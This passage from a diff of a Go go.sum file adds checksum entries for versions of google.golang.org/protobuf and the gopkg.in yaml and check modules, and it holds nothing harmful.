v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= +google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= +google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.24.0/go.mod h1:r/3tXBNzIEhYS9I1OUVjXDlt8tc493IdKGjtUeSXeh4= +google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= +google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= +google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= +google.golang.org/protobuf v1.27.1 h1:SnqbnDw1V7RiZcXPx5MEeqPv2s79L9i7BJUlG/+RurQ= +google.golang.org/protobuf v1.27.1/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.3/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=